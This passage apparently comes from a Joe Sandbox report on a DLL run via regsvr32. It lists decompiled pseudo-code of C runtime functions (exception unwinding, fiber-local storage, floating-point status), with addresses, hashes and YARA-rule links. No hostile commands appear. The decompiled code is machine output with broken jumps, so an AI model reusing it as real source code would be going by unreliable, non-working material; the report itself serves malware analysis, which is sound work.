				if (r9d - _t115[1] >= 0) goto 0x80003d8d;
				goto 0x80003c31;
				E00000001180002004(r9d - _t115[1], _t109, _t115, __r9, __r9, _t115);
				goto 0x80003d6d;
				if (_t115[3] != 0) goto 0x80003cbe;
				if (( *_t115 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003c9e;
				_t101 = _t115[8];
				if (_t101 == 0) goto 0x80003c9e;
				E00000001180002408(_t109);
				if (_t101 != 0) goto 0x80003cbe;
				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003d6d;
				if ((_t115[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003d6d;
				if ( *_t136 != 0xe06d7363) goto 0x80003d34;
				if ( *((intOrPtr*)(_t136 + 0x18)) - 3 < 0) goto 0x80003d34;
				if ( *((intOrPtr*)(_t136 + 0x20)) - 0x19930522 <= 0) goto 0x80003d34;
				_t111 =  *((intOrPtr*)(_t136 + 0x30));
				if ( *((intOrPtr*)(_t111 + 8)) == 0) goto 0x80003d34;
				E0000000118000241C(_t111);
				if (_t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)) == 0) goto 0x80003d34;
				_v32 = _a64 & 0x000000ff;
				_v40 = _a56;
				_v48 = _a48;
				_v56 = _t115;
				 *0x80016370(_t158);
				goto 0x80003d72;
				_v32 = _a56;
				_v40 = _a48;
				_v48 = _a64;
				_v56 = _t115;
				E00000001180003328(_a64 & 0x000000ff, 0x80000026, __esi, _t136, _t142, _t159, _t139, _t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)));
				return 1;
			}



















                                                                                                                                                                                                                    0x180003b5c
                                                                                                                                                                                                                    0x180003b5f
                                                                                                                                                                                                                    0x180003b63
                                                                                                                                                                                                                    0x180003b67
                                                                                                                                                                                                                    0x180003b6b
                                                                                                                                                                                                                    0x180003b75
                                                                                                                                                                                                                    0x180003b78
                                                                                                                                                                                                                    0x180003b7e
                                                                                                                                                                                                                    0x180003b81
                                                                                                                                                                                                                    0x180003b84
                                                                                                                                                                                                                    0x180003b89
                                                                                                                                                                                                                    0x180003b8e
                                                                                                                                                                                                                    0x180003ba4
                                                                                                                                                                                                                    0x180003bac
                                                                                                                                                                                                                    0x180003bb0
                                                                                                                                                                                                                    0x180003bb6
                                                                                                                                                                                                                    0x180003bc0
                                                                                                                                                                                                                    0x180003bc4
                                                                                                                                                                                                                    0x180003bd2
                                                                                                                                                                                                                    0x180003bd8
                                                                                                                                                                                                                    0x180003be2
                                                                                                                                                                                                                    0x180003bec
                                                                                                                                                                                                                    0x180003bfa
                                                                                                                                                                                                                    0x180003c04
                                                                                                                                                                                                                    0x180003c08
                                                                                                                                                                                                                    0x180003c14
                                                                                                                                                                                                                    0x180003c1c
                                                                                                                                                                                                                    0x180003c25
                                                                                                                                                                                                                    0x180003c2b
                                                                                                                                                                                                                    0x180003c37
                                                                                                                                                                                                                    0x180003c3c
                                                                                                                                                                                                                    0x180003c43
                                                                                                                                                                                                                    0x180003c45
                                                                                                                                                                                                                    0x180003c4d
                                                                                                                                                                                                                    0x180003c57
                                                                                                                                                                                                                    0x180003c61
                                                                                                                                                                                                                    0x180003c6c
                                                                                                                                                                                                                    0x180003c71
                                                                                                                                                                                                                    0x180003c7a
                                                                                                                                                                                                                    0x180003c88
                                                                                                                                                                                                                    0x180003c8a
                                                                                                                                                                                                                    0x180003c8e
                                                                                                                                                                                                                    0x180003c90
                                                                                                                                                                                                                    0x180003c9c
                                                                                                                                                                                                                    0x180003caa
                                                                                                                                                                                                                    0x180003cb8
                                                                                                                                                                                                                    0x180003cc4
                                                                                                                                                                                                                    0x180003cca
                                                                                                                                                                                                                    0x180003cd3
                                                                                                                                                                                                                    0x180003cd5
                                                                                                                                                                                                                    0x180003cdd
                                                                                                                                                                                                                    0x180003cdf
                                                                                                                                                                                                                    0x180003cf2
                                                                                                                                                                                                                    0x180003d09
                                                                                                                                                                                                                    0x180003d18
                                                                                                                                                                                                                    0x180003d20
                                                                                                                                                                                                                    0x180003d27
                                                                                                                                                                                                                    0x180003d2c
                                                                                                                                                                                                                    0x180003d32
                                                                                                                                                                                                                    0x180003d3f
                                                                                                                                                                                                                    0x180003d51
                                                                                                                                                                                                                    0x180003d5f
                                                                                                                                                                                                                    0x180003d63
                                                                                                                                                                                                                    0x180003d68
                                                                                                                                                                                                                    0x180003d8c

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                                                                    • API String ID: 851805269-3733052814
                                                                                                                                                                                                                    • Opcode ID: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                                                                                                                                                    • Instruction ID: ef6ae88387dfa06c815bde898961dd69fb07e80911919095ce8a45e838d8869a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5617F3220078886EBB6CF26E44539877A9F758BD4F18C116EB9847BD5CF38D699C701
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180002A84 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    C-Code - Quality: 30%
                                                                                                                                                                                                                    			E00000001180002A84(void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
				void* _t76;
				void* _t83;
				void* _t84;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t113;
				void* _t118;
				void* _t130;
				long long _t133;
				intOrPtr* _t135;
				signed long long _t144;
				void* _t150;
				signed long long _t154;
				void* _t156;
				long long _t158;
				intOrPtr* _t159;
				void* _t161;
				void* _t162;
				signed long long _t166;
				void* _t170;
				intOrPtr _t171;
				void* _t173;
				void* _t174;
				void* _t176;
				void* _t178;
				void* _t180;
				intOrPtr* _t181;

				_t130 = __rax;
				 *((long long*)(_t161 + 8)) = __rbx;
				 *((long long*)(_t161 + 0x10)) = _t158;
				 *((long long*)(_t161 + 0x18)) = __rsi;
				_t162 = _t161 - 0x40;
				_t159 = __rcx;
				_t181 = __r9;
				_t174 = __rdx;
				E00000001180004584(_t76, __r8);
				_t171 =  *((intOrPtr*)(__r9 + 8));
				_t135 =  *((intOrPtr*)(__r9 + 0x38));
				_t178 =  *__r9 - _t171;
				_t103 =  *((intOrPtr*)(__r9 + 0x48));
				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x80002bac;
				 *((long long*)(_t162 + 0x30)) = __rcx;
				 *((long long*)(_t162 + 0x38)) = __r8;
				if (_t103 -  *_t135 >= 0) goto 0x80002c58;
				_t154 = __r8 + __r8;
				if (_t178 - _t130 < 0) goto 0x80002b9e;
				if (_t178 - _t130 >= 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t154 * 8)) == 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(_t135 + 0xc + _t154 * 8)) == 1) goto 0x80002b2a;
				_t113 =  *((long long*)(_t130 + _t171))(_t180, _t176, _t173, _t170, _t150);
				if (_t113 < 0) goto 0x80002ba5;
				if (_t113 <= 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0x80002b5b;
				if ( *0x800164f8 == 0) goto 0x80002b5b;
				if (E0000000118000F7F0(_t130 + _t171, _t135, 0x800164f8) == 0) goto 0x80002b5b;
				_t83 =  *0x800164f8();
				r8d = 1;
				_t84 = E00000001180004550(_t83, _t159 + _t171, _t174);
				_t101 =  *((intOrPtr*)(_t135 + 0x10 + _t154 * 8));
				r9d =  *_t159;
				 *((long long*)(_t162 + 0x28)) =  *((intOrPtr*)(_t181 + 0x40));
				_t133 =  *((intOrPtr*)(_t181 + 0x28));
				 *((long long*)(_t162 + 0x20)) = _t133;
				__imp__RtlUnwindEx();
				E00000001180004580(_t84);
				goto 0x80002ada;
				goto 0x80002c5d;
				_t156 =  *((intOrPtr*)(_t181 + 0x20)) - _t171;
				goto 0x80002c4e;
				_t144 = _t174 + _t174;
				if (_t178 - _t133 < 0) goto 0x80002c4c;
				_t118 = _t178 - _t133;
				if (_t118 >= 0) goto 0x80002c4c;
				r10d =  *(_t159 + 4);
				r10d = r10d & 0x00000020;
				if (_t118 == 0) goto 0x80002c21;
				r9d = 0;
				if (_t101 == 0) goto 0x80002c1c;
				r8d = r9d;
				_t166 = _t159 + _t159;
				if (_t156 - _t133 < 0) goto 0x80002c14;
				if (_t156 - _t133 >= 0) goto 0x80002c14;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t166 * 8)) !=  *((intOrPtr*)(_t135 + 0x10 + _t144 * 8))) goto 0x80002c14;
				if ( *((intOrPtr*)(_t135 + 0xc + _t166 * 8)) ==  *((intOrPtr*)(_t135 + 0xc + _t144 * 8))) goto 0x80002c1c;
				r9d = r9d + 1;
				if (r9d - _t101 < 0) goto 0x80002be4;
				if (r9d != _t101) goto 0x80002c58;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t144 * 8)) == 0) goto 0x80002c35;
				if (_t156 != _t133) goto 0x80002c4c;
				if (r10d != 0) goto 0x80002c58;
				goto 0x80002c4c;
				 *((intOrPtr*)(_t181 + 0x48)) = _t150 + 1;
				r8d =  *((intOrPtr*)(_t135 + 0xc + _t144 * 8));
				 *((long long*)(_t166 + _t171))();
				if (_t103 + 2 -  *_t135 < 0) goto 0x80002bb8;
				return 1;
			}






























                                                                                                                                                                                                                    0x180002a84
                                                                                                                                                                                                                    0x180002a84
                                                                                                                                                                                                                    0x180002a89
                                                                                                                                                                                                                    0x180002a8e
                                                                                                                                                                                                                    0x180002a9c
                                                                                                                                                                                                                    0x180002aa0
                                                                                                                                                                                                                    0x180002aa3
                                                                                                                                                                                                                    0x180002aac
                                                                                                                                                                                                                    0x180002aaf
                                                                                                                                                                                                                    0x180002ab4
                                                                                                                                                                                                                    0x180002abb
                                                                                                                                                                                                                    0x180002abf
                                                                                                                                                                                                                    0x180002ac6
                                                                                                                                                                                                                    0x180002aca
                                                                                                                                                                                                                    0x180002ad0
                                                                                                                                                                                                                    0x180002ad5
                                                                                                                                                                                                                    0x180002adc
                                                                                                                                                                                                                    0x180002ae4
                                                                                                                                                                                                                    0x180002aee
                                                                                                                                                                                                                    0x180002afb
                                                                                                                                                                                                                    0x180002b06
                                                                                                                                                                                                                    0x180002b11
                                                                                                                                                                                                                    0x180002b24
                                                                                                                                                                                                                    0x180002b26
                                                                                                                                                                                                                    0x180002b28
                                                                                                                                                                                                                    0x180002b31
                                                                                                                                                                                                                    0x180002b3b
                                                                                                                                                                                                                    0x180002b4b
                                                                                                                                                                                                                    0x180002b55
                                                                                                                                                                                                                    0x180002b5f
                                                                                                                                                                                                                    0x180002b6b
                                                                                                                                                                                                                    0x180002b77
                                                                                                                                                                                                                    0x180002b7e
                                                                                                                                                                                                                    0x180002b85
                                                                                                                                                                                                                    0x180002b8a
                                                                                                                                                                                                                    0x180002b8e
                                                                                                                                                                                                                    0x180002b93
                                                                                                                                                                                                                    0x180002b99
                                                                                                                                                                                                                    0x180002ba0
                                                                                                                                                                                                                    0x180002ba7
                                                                                                                                                                                                                    0x180002bb0
                                                                                                                                                                                                                    0x180002bb3
                                                                                                                                                                                                                    0x180002bba
                                                                                                                                                                                                                    0x180002bc4
                                                                                                                                                                                                                    0x180002bce
                                                                                                                                                                                                                    0x180002bd1
                                                                                                                                                                                                                    0x180002bd3
                                                                                                                                                                                                                    0x180002bd7
                                                                                                                                                                                                                    0x180002bdb
                                                                                                                                                                                                                    0x180002bdd
                                                                                                                                                                                                                    0x180002be2
                                                                                                                                                                                                                    0x180002be4
                                                                                                                                                                                                                    0x180002be7
                                                                                                                                                                                                                    0x180002bf2
                                                                                                                                                                                                                    0x180002bfc
                                                                                                                                                                                                                    0x180002c07
                                                                                                                                                                                                                    0x180002c12
                                                                                                                                                                                                                    0x180002c14
                                                                                                                                                                                                                    0x180002c1a
                                                                                                                                                                                                                    0x180002c1f
                                                                                                                                                                                                                    0x180002c27
                                                                                                                                                                                                                    0x180002c2c
                                                                                                                                                                                                                    0x180002c31
                                                                                                                                                                                                                    0x180002c33
                                                                                                                                                                                                                    0x180002c3b
                                                                                                                                                                                                                    0x180002c3f
                                                                                                                                                                                                                    0x180002c49
                                                                                                                                                                                                                    0x180002c52
                                                                                                                                                                                                                    0x180002c7a

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                    • String ID: csm$f
                                                                                                                                                                                                                    • API String ID: 2395640692-629598281
                                                                                                                                                                                                                    • Opcode ID: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                                                                                                                                                    • Instruction ID: 7da8602e18cf7747c8af8830ce248ccf40cfdad7849785c1bee6e388392e864c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D551BD32601A588AEBAADF15E844B9D37A5F348BC8F51C121FE1A47789DF74DA89C700
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180006108 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                    • Opcode ID: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                                                                                                                                                    • Instruction ID: 6c3fae355f4def66f2243ece08b04bf3b1533bf3e7ed4235295a513a2b2c2168
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62F06D75714E0891FB92CB24E8443EA6371EB8DBE1F588215FA6A462F6CF2CC24CC300
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00000001800077FC Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                                    			E000000011800077FC(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				void* _t51;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0x8000782e;
				if (sil >= 0) goto 0x8000782e;
				E0000000118000BC4C(_t27, _t51);
				_t28 = _t27 & 0xfffffff7;
				goto 0x80007885;
				_t42 = 0x00000004 & dil;
				if (_t42 == 0) goto 0x80007849;
				asm("dec eax");
				if (_t42 >= 0) goto 0x80007849;
				E0000000118000BC4C(_t28, _t51);
				_t29 = _t28 & 0xfffffffb;
				goto 0x80007885;
				_t43 = dil & 0x00000001;
				if (_t43 == 0) goto 0x80007865;
				asm("dec eax");
				if (_t43 >= 0) goto 0x80007865;
				E0000000118000BC4C(_t29, _t51);
				_t30 = _t29 & 0xfffffffe;
				goto 0x80007885;
				_t44 = dil & 0x00000002;
				if (_t44 == 0) goto 0x80007885;
				asm("dec eax");
				if (_t44 >= 0) goto 0x80007885;
				if ((dil & 0x00000010) == 0) goto 0x80007882;
				E0000000118000BC4C(_t30, _t51);
				_t31 = _t30 & 0xfffffffd;
				_t46 = dil & 0x00000010;
				if (_t46 == 0) goto 0x8000789f;
				asm("dec eax");
				if (_t46 >= 0) goto 0x8000789f;
				E0000000118000BC4C(_t31, _t51);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}













                                                                                                                                                                                                                    0x1800077fc
                                                                                                                                                                                                                    0x180007801
                                                                                                                                                                                                                    0x180007810
                                                                                                                                                                                                                    0x180007818
                                                                                                                                                                                                                    0x18000781d
                                                                                                                                                                                                                    0x180007824
                                                                                                                                                                                                                    0x180007829
                                                                                                                                                                                                                    0x18000782c
                                                                                                                                                                                                                    0x180007833
                                                                                                                                                                                                                    0x180007836
                                                                                                                                                                                                                    0x180007838
                                                                                                                                                                                                                    0x18000783d
                                                                                                                                                                                                                    0x18000783f
                                                                                                                                                                                                                    0x180007844
                                                                                                                                                                                                                    0x180007847
                                                                                                                                                                                                                    0x180007849
                                                                                                                                                                                                                    0x18000784d
                                                                                                                                                                                                                    0x18000784f
                                                                                                                                                                                                                    0x180007854
                                                                                                                                                                                                                    0x18000785b
                                                                                                                                                                                                                    0x180007860
                                                                                                                                                                                                                    0x180007863
                                                                                                                                                                                                                    0x180007865
                                                                                                                                                                                                                    0x180007869
                                                                                                                                                                                                                    0x18000786b
                                                                                                                                                                                                                    0x180007870
                                                                                                                                                                                                                    0x180007876
                                                                                                                                                                                                                    0x18000787d
                                                                                                                                                                                                                    0x180007882
                                                                                                                                                                                                                    0x180007885
                                                                                                                                                                                                                    0x180007889
                                                                                                                                                                                                                    0x18000788b
                                                                                                                                                                                                                    0x180007890
                                                                                                                                                                                                                    0x180007897
                                                                                                                                                                                                                    0x1800078b5

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _set_statfp
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1156100317-0
                                                                                                                                                                                                                    • Opcode ID: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                                                                                                                                                    • Instruction ID: 766be9376166aa195c434f29f3971196c8b67f74f947fd55b9f7e9fcb960d4ba
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D117736F90A0941F7EE9128D45A3E63141AB6C3F4F59C624B66E462E7CF2C4B59C305
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180007FF8 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FlsGetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008017
                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008036
                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000805E
                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000806F
                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008080
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Value
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                                                                    • Opcode ID: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
                                                                                                                                                                                                                    • Instruction ID: be0361fe5fc774fdb93e2323036551c88fb1abd5f2001d1ea80391924f68e359
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80115B7070924881FADBD32569553E932927F8C7F0F18C324B8B9067DADE69C64D5701
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180007E8C Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Value
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                                                                    • Opcode ID: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
                                                                                                                                                                                                                    • Instruction ID: 1e63756919ea820504c2c280bc0c9b8fbb4cbfe5ca1be2f3c00cf3ab00ed04ff
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F111397070624D41FAEBE22594527F932826B6D3F0F58CB24B93A0A2C7DE2C9A4D4310
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180003800 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                    			E00000001180003800(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
				void* _t19;
				void* _t27;
				void* _t36;
				void* _t39;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;

				_t27 = _t45;
				 *((long long*)(_t27 + 0x20)) = __rbx;
				 *((long long*)(_t27 + 0x18)) = __r8;
				 *((long long*)(_t27 + 0x10)) = __rdx;
				_t43 = _t27 - 0x3f;
				_t46 = _t45 - 0xc0;
				if ( *__rcx == 0x80000003) goto 0x800038a4;
				E00000001180002D40(_t27);
				r12d =  *((intOrPtr*)(_t43 + 0x6f));
				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0x800038bf;
				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
				E00000001180002D40(_t27);
				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0x800038bf;
				if ( *__rcx == 0xe0434f4d) goto 0x800038bf;
				r13d =  *((intOrPtr*)(_t43 + 0x77));
				if ( *__rcx == 0xe0434352) goto 0x800038c3;
				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
				_t19 = E00000001180001F20(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
				if (_t19 == 0) goto 0x800038c3;
				return _t19;
			}















                                                                                                                                                                                                                    0x180003800
                                                                                                                                                                                                                    0x180003803
                                                                                                                                                                                                                    0x180003807
                                                                                                                                                                                                                    0x18000380b
                                                                                                                                                                                                                    0x18000381a
                                                                                                                                                                                                                    0x18000381e
                                                                                                                                                                                                                    0x180003834
                                                                                                                                                                                                                    0x180003836
                                                                                                                                                                                                                    0x18000383b
                                                                                                                                                                                                                    0x180003848
                                                                                                                                                                                                                    0x18000384c
                                                                                                                                                                                                                    0x180003855
                                                                                                                                                                                                                    0x18000385e
                                                                                                                                                                                                                    0x180003867
                                                                                                                                                                                                                    0x180003870
                                                                                                                                                                                                                    0x180003874
                                                                                                                                                                                                                    0x180003884
